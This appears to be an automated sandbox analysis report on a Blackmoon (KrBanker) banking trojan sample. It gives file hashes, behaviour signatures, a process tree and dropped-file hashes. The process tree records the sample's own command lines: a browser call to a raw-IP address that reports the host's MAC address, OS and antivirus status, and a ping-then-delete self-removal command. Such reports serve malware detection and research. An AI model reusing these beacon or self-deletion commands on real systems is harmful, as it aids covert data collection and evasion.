Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-12-2024 12:04

General

  • Target

    8759d9c287fe386ebde7279a0b6f9e5bd7c0dff2031585fbb79ae66052292435N.exe

  • Size

    34KB

  • MD5

    ab811a31a008784c046000890d0994e0

  • SHA1

    3bf1515fee83dbc21ca834077e3848e04bda447e

  • SHA256

    8759d9c287fe386ebde7279a0b6f9e5bd7c0dff2031585fbb79ae66052292435

  • SHA512

    60dd50b424b17a8b253ac1831fb424fcfab61e8efc3e0b16d318ef6ebcf2e93ee3163daef530d0c5f6253f311cc1dde56eda4f767526b3eff1cda5445d8ebaab

  • SSDEEP

    768:gxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMli:RQftW0QGq/aabWrTsGx3P6Cbtr

Malware Config

Signatures

  • Blackmoon family
  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 2 IoCs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8759d9c287fe386ebde7279a0b6f9e5bd7c0dff2031585fbb79ae66052292435N.exe
    "C:\Users\Admin\AppData\Local\Temp\8759d9c287fe386ebde7279a0b6f9e5bd7c0dff2031585fbb79ae66052292435N.exe"
    1⤵
    • Adds Run key to start application
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2376
    • C:\Program Files\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=70C20ED13727D0DBBD8DD03036959DCA&os=Windows 7&avs=unknow&ps=NO.&ver=jack
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2384 CREDAT:275457 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1948
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\8759d9c287fe386ebde7279a0b6f9e5bd7c0dff2031585fbb79ae66052292435N.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 3
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c8d3eb9f09427b56fa8e3fbe7c863ab8

    SHA1

    58866af4d93c303476af488e0c9367fdc41e21bc

    SHA256

    883560eace562a09d20a5ebc3d5469b01f4735511423c009512dbe80373b810b

    SHA512

    e4b290441985a733c1bb02271fc2e91408f344694fd9722eeae7b5ef1a62bb53744aded9894ea4d1adf9a29b624eaa4b3fcc6e9418d7edc2e4522e43360cd1b2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6558e2286c4eaba178c29c4bbd414b6e

    SHA1

    678a2a77ec32ccdd6c1f3de3ae4e0e81bb4b6bf8

    SHA256

    df48453afca94396cee88d7d98875dbe480cddbd7305cdd9358399c65b41b89f

    SHA512

    d1d959a56f8b3b7375684c6a71fc0bdfe82c5966b4ad02c3582ddae378a0333672d8f2b2741303ff74ec5cadc6c9ce9e69030418fb5d5a309386a808d6434eb7

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3bc3fc8eec532f304374750bf84727f6

    SHA1

    07d477e24d73520668b6f93c61591fc5ce8629c9

    SHA256

    63f12a60f8ab02c0ea4bf33e34f2cba24009bb76588086d833c033a4b39e8990

    SHA512

    ed6681fa1712160772c62ebed4e38981494bff481a641dd3b7a5eb52825b4aaf27f0103c5c052af57034ebcc3ebe85d62eb0462e9a7e3ee6749a7dc5e5b4917a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    3a2833f7fc7ac1fac06227c62ef1c8cf

    SHA1

    086e0c6cdd59422bc5277d6b54b79e53592dd3cf

    SHA256

    9779688fdf97ef16e775906566531a2c42cb31748416f9bd5a7730e801ecf0b7

    SHA512

    71ed8412e6092e15b3d1d4074da911eb05a410cc5b7c97885377bb43a48a06b7ac1fa21ac7d8f2833a4e8a1cda38dd0db3227345287d649cf356d7cd1906c869

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2b533d608d2912c1eb59a1101ab578cb

    SHA1

    b4ddf0ab1c0172f38cf4d402d7e8bac48338ca1f

    SHA256

    17c7ef21e247ee9e29590c9fbe9ad7eef5f7d19845a7b9bfab30e29d27f80010

    SHA512

    7c55639765f81c875942b55d49e4d1a278d66a6db1ebd87c96e17aadb4ff492db69e587b5e0da1f3df0f5b291f6f4df107df4e9e9963e8f56cb6ad0f8d16aca8

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2df754996603441c7bce46edac596aa3

    SHA1

    b3899cd97a1be333f0888dcbb082bb28359a838a

    SHA256

    99c63c62ecfecc1cfd88d237ed807200d5e2370facba68b2f714dbadca613a54

    SHA512

    ad7b69e702dcdecd42463fa60aacdfb340c531aa28e468931e4ee6c9acc0a88d3a565fc54913838c0fa9af44997c744675511aefb68af7ed0a3d81d4f31f6478

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5c1e9b118bf8efa4c1aa909aab6f63fd

    SHA1

    aac409d54e2916aa192a6d3fe1dbd490a434296f

    SHA256

    2b313e9f5069ae9bfedaf0f13425b2b642386f5872d3853ccfdfcff318d983f5

    SHA512

    600452c1b81444226cc97ef00651ba502cd3f6b09376ebea08ac6ac974662463bb8a73fd48d5e005f4fa7b2b24e4c85d346292ccd46225e9680382da06581daa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    580becc2e9dcaef79a40389149e1f9ad

    SHA1

    189081133848a65b8cce0cc1bf15634e6f87c7d6

    SHA256

    3f7c91883c6abb4521b381cf66d96ddcfb99e947554e423c8a806e2c5ba68e83

    SHA512

    42e24ba27621260f35e55b10ebfa7b3fb34c80f3066a92f23d6bd035d4e4c53e1a7386b25638b11926e0ba2b4495ef79d1074f09a1fe63ee01febf43866bc721

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b40529c8307c15fe3e25524168758975

    SHA1

    8190ee25891ab146f89b53335a08b47d939e7c2c

    SHA256

    708d7ce27c4c131ddb518775fb795e26b18d1df6c8b3462ae25751985e252d38

    SHA512

    7e88605c52529774cff61ed35efe37d4a4a49a65b0ccf3d78d11416414272e44abb04c15ac83866e968a2c452b8d5b0facd1eaf1e32ef3160f6fe12f8071a76e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b36b85a98fee4a92c0d4ddb5e96bdf9f

    SHA1

    c985b5e60a1882bc66a10fbcca6706a79ffefa9d

    SHA256

    eb194696e23d1a33d76789427f0cd37113bb7bffa92df943c4cd0d249f1aeed5

    SHA512

    e8d5baa9abe1f1a9d74dc0822e99d4f53d4beedf473759486520d1c07bbb94e58abc633865a259b63cf209a6b8a44df0b0d7b595451b8ab6a13839a4cebd6a7b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6e88ef0d5c8876fc9dcd1ee0ff80bd2a

    SHA1

    c0e45554f4cf4aca21b17d0657a1f6602bd57b55

    SHA256

    876adb654bffa2c4ee727f12fbfdd2607798191e3444da5af7bc269c92c53424

    SHA512

    9af7fd13cfe6c2a476f840eac0459c5169ea78c7ff4b27858c181d111577c59ac86decd09c62a4b059529390ea92d44a81b41970933e17e51254c70526cbcaab

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    cf6d0884e7634b9497d6c58c73894627

    SHA1

    f1ef6b0784340faa3acc5af71d165da696be1159

    SHA256

    357ac317c860ffb47c35b81170a341a3ffe95e04d7ce6605295dd785890a5c74

    SHA512

    649117f84c80789c8116c945a3f57db004b47e72dc9077c50231398a77526bb226c487aa333d389d3185f143fa43609fc0791fee960d6c46c9d4b258eecef078

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    498f44c85612b9c837acc63e08cab09c

    SHA1

    cbf2322b811055e6917c1cedab6fbe363c4b858d

    SHA256

    7e6757af68d5e245fa41d5dad9b951c978b882dc118945bded0b35a94f1bc110

    SHA512

    de9ba1bdfcf2cb436840dbbde5df4c5b0e99b0c8caf718a6d012cb94359e055c451ff0bec12f2d004f909a1a66d6deca56e29809443c854272bb160859af0ccd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    db035e6e0e9e1293ec3d201a4b3eff58

    SHA1

    9dd59842d450d97101f1fda1ecdf4cb0b3eefb61

    SHA256

    9a96adb27713a33cbb3721100c083cde0dec4b3fc250f7ef7c259e6fc42016d4

    SHA512

    0d7308b83c93f17d7599e78cac4e1b09aa929475240acdd6e03b13758d42b1b38fec8c6391538ba6d5044243f776b18c4923f1a30d6423fca382dec3fc9f072d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    db9a29c91f36b6be644690c4a9761fa7

    SHA1

    c4c1254524f2db6fc2c17eb25604237ebfc9ad7f

    SHA256

    ceae5726bfb1357dffc758a54d1288407be01f520ef4600daa4d25d2b8e5d94d

    SHA512

    4a1df2a133f948d7ef86d511d867f00dfba4db0ab8a6e035d2ef248be41b82573c091a8111b25e00b6905c9ad3d8884c844cf421293f803d3aa5a476dc727089

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    e5c53adeaf2b694b725a066a4adb81bf

    SHA1

    02ac7129964d8ba5761d4d86eef2845e8c634457

    SHA256

    fab7b3bbf15e259b4435bafea18986993bcad3a26cfd3b808b3efb530b27967c

    SHA512

    06d00a0d8e2dede6b5db6e200bc5e39b8105c6677bb474dbbbefc87121f23bbd21a18d6160f0f56d173f6cbde633144d6630ced0ff9f216c3475e49e4dc6ede2

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    b4c3e21010e84d54d66d767a90118aca

    SHA1

    7bb3d41d889622400db2522f08676fd4b15c5a18

    SHA256

    2fae797d09969a25b82f0ecc7499afd556379c6cbe82ce701b552e8b7fed8402

    SHA512

    929d115f75899750d07e254c7da16ed69e4cced15e431a0ab86fff4bed3a3d8483543490ca74ed5ec37016fb7a74b81a06fbff067ff6d7a9c8cbb63f241a43aa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c379fef9db64fb91accdf244cd1fc076

    SHA1

    60319ce452fc285030587a5b5df7861e51c0ab48

    SHA256

    0a023c3379d46acc38bedb3ca446bed0e35d0b8633ec13f4d82569b68bae9828

    SHA512

    cafc59feda14a7a97693a77ca874649efa82c52a7ac11b4d93aa10af7a521f9e0eec8459d123ce586aa7be8d81ba1382c543037a5e52ba5a6438024f5675b1ad

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    65e285830ada7b4c485b4b9c3f5cfa3d

    SHA1

    8458cba9b8a02c2eff1a0c47247708ff50dbe146

    SHA256

    995bbfbd312368b81a8123f31d7d51ff0f8fa247e3fd64fef95e7b6f30654acf

    SHA512

    22728ae520fc65fc6be51ec8292658e434689567c26aeb62d40a016047dd3f3e79565f187c9556e8680e0dc9e37b7fbeaa23a474018a05991678230742571aeb

  • C:\Users\Admin\AppData\Local\Temp\Cab6C8C.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar6D59.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2376-3-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB

  • memory/2376-0-0x0000000000400000-0x0000000000431200-memory.dmp

    Filesize

    196KB